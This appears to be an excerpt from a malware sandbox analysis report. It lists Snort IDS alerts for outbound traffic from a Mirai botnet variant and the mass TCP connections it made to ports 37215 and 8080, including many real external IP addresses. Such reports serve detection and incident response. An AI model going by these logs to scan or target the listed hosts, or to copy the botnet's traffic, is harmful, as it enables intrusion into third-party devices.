    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36416 -> 112.49.54.198:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:35546 -> 88.99.102.157:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44594 -> 88.216.146.22:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:55648 -> 88.247.113.3:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:48524 -> 95.215.58.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:46666 -> 95.216.168.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:48756 -> 95.173.189.215:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:54238 -> 88.221.156.54:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:33560 -> 88.221.176.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:37972 -> 88.198.141.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53562 -> 112.165.172.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:50442 -> 88.133.93.90:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:33072 -> 95.101.105.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:39654 -> 88.149.199.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36306 -> 88.247.182.129:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:42944 -> 88.218.251.248:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:49246 -> 112.166.42.212:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:48240 -> 112.197.182.94:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:54610 -> 112.74.52.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:47720 -> 112.168.45.127:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:46360 -> 112.250.107.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53566 -> 88.213.229.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44710 -> 88.198.244.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:39160 -> 88.81.88.151:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53398 -> 88.216.197.136:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:54728 -> 88.6.1.219:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:49994 -> 95.101.250.125:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59798 -> 95.100.77.176:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53390 -> 95.111.239.209:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:57350 -> 95.101.40.153:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:57458 -> 95.252.118.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:51512 -> 95.197.231.187:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53456 -> 95.154.219.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59816 -> 95.100.77.176:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:45934 -> 95.101.154.85:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:50362 -> 95.217.171.32:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:43658 -> 88.102.200.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:38410 -> 88.221.207.114:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:39992 -> 88.200.21.153:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:55500 -> 88.99.171.69:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:54934 -> 88.221.230.98:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59870 -> 95.179.198.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:57940 -> 88.192.43.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44546 -> 88.225.225.119:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36570 -> 95.101.106.138:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:48550 -> 112.184.55.181:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:34350 -> 112.133.239.126:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:34494 -> 112.162.116.167:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:58272 -> 95.101.151.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:56426 -> 95.216.102.155:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:45400 -> 112.124.41.118:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:35956 -> 95.111.202.34:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:51522 -> 112.184.111.109:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36546 -> 112.124.19.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:37314 -> 112.124.183.72:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53172 -> 112.15.125.6:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36188 -> 112.166.123.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:54858 -> 112.90.157.133:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:43224 -> 88.198.209.14:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53170 -> 112.15.125.6:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:57252 -> 88.221.224.160:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:47370 -> 88.81.91.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:35182 -> 112.60.23.222:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:43630 -> 112.196.149.110:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:43902 -> 112.46.40.156:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59738 -> 112.173.96.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:57878 -> 112.146.101.184:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:57824 -> 95.101.190.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:46370 -> 95.216.74.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:50250 -> 95.129.102.107:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:40988 -> 95.64.185.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:51132 -> 95.86.103.197:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:46504 -> 112.185.217.189:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:60720 -> 112.78.212.8:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:40300 -> 112.132.209.9:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:52130 -> 95.173.172.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:56642 -> 95.141.118.162:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:35568 -> 95.100.71.63:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:36738 -> 95.100.219.51:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:60432 -> 112.216.224.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:39040 -> 112.162.247.113:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:39808 -> 88.93.245.98:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:38296 -> 88.221.134.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:45990 -> 112.213.88.189:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44462 -> 88.218.17.104:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44896 -> 112.185.184.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:49016 -> 95.164.18.137:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:34036 -> 95.101.227.228:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:41314 -> 95.100.55.230:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:41026 -> 95.101.17.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59078 -> 95.58.97.201:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:47478 -> 95.32.182.109:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:48214 -> 95.101.226.50:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:56388 -> 95.100.178.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59090 -> 95.100.51.140:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:52122 -> 95.101.220.121:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:56654 -> 95.217.179.126:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:40374 -> 95.101.227.112:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:44288 -> 95.101.219.113:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:49384 -> 95.110.166.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:47462 -> 95.101.90.13:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:53162 -> 95.216.20.39:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:59380 -> 95.216.8.103:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.14:51180 -> 95.211.22.141:80
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49250
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49280
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49346
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49356
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49374
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49378
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49386
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49400
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49420
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49476
    Source: unknownNetwork traffic detected: HTTP traffic on port 55230 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54888 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 54888
    Source: unknownNetwork traffic detected: HTTP traffic on port 44280 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44280
    Source: unknownNetwork traffic detected: HTTP traffic on port 39084 -> 37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.163.163.249:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.83.106.248:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.109.70.226:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.252.42.214:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.63.198.61:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.23.14.51:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.162.165.249:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.106.100.91:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.174.3.205:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.86.50.201:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.255.250.43:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.88.11.154:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.32.240.117:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.142.204.194:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.242.230.147:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.121.91.6:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.82.151.71:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.18.139.35:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.116.135.225:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.39.25.227:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.116.143.66:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.233.75.209:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.172.5.203:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.57.118.147:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.26.31.198:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.136.60.246:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.129.56.219:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.159.173.63:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.165.238.48:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.45.250.73:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.26.131.116:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.84.132.118:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.52.146.179:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.73.101.57:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.224.18.39:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.76.169.10:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.200.164.152:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.199.178.129:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.2.176.110:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.247.62.13:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.77.123.47:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.40.93.190:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.167.250.45:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.92.171.111:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.11.133.126:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.194.204.141:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.162.0.147:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.154.249.71:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.67.15.101:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.146.254.186:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.182.119.129:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.167.24.98:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.98.137.107:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.221.104.57:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.122.46.251:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.52.17.82:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.156.50.120:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.119.18.200:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.188.9.104:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.216.230.56:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.43.37.181:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.80.107.16:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.166.144.74:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.246.154.220:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.214.201.177:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.7.35.210:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.254.234.92:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.147.176.69:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.153.34.138:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.21.7.228:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.188.117.95:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.90.40.246:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.217.188.219:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.48.116.171:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.8.188.81:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.6.108.157:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.230.39.188:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.127.130.244:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.50.5.24:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.30.126.136:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.10.120.167:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.28.76.166:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.16.155.173:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.182.179.119:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.246.189.31:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.186.171.34:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.1.216.213:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.83.124.150:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.68.12.56:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.7.205.172:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.161.39.132:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.15.238.212:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.199.164.35:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.58.106.90:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.205.94.125:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.98.42.71:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.201.218.184:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.250.225.35:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.121.241.19:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.16.160.78:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.90.160.51:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.134.66.135:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.35.251.10:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.121.46.162:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.143.222.222:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.159.230.235:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.126.50.125:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.62.41.48:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.83.181.118:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.109.88.49:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.233.68.164:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.255.34.106:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.103.155.12:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.63.46.233:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.199.161.206:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.184.217.45:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.140.162.241:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.159.27.131:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.98.3.108:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.89.181.246:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.84.74.29:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.253.75.49:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.197.244.223:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.179.205.98:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.138.187.172:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.216.222.185:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.236.14.12:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.205.72.53:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.35.11.179:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.235.244.147:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.168.207.59:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.201.31.213:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.198.194.38:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.226.91.24:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.51.19.241:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.212.252.217:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.131.120.207:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.170.199.64:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.190.247.7:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.118.14.58:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.93.33.65:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.182.141.79:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.88.35.41:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.254.17.22:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.123.20.204:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.223.20.13:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.2.111.48:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.4.250.254:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.52.111.250:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.37.170.69:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.50.244.158:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.147.154.134:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.230.148.213:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.60.149.111:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.117.157.252:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.181.30.128:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.102.4.215:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.63.81.177:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.163.179.88:37215
    Source: global trafficTCP traffic: 192.168.2.14:39979 -> 157.201.64.172:37215
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.187.163.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 62.186.165.249:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.149.172.248:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 31.117.134.226:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 95.36.234.214:8080
    Source: global trafficTCP traffic: 192.168.2.14:40747 -> 94.55.131.132:8080
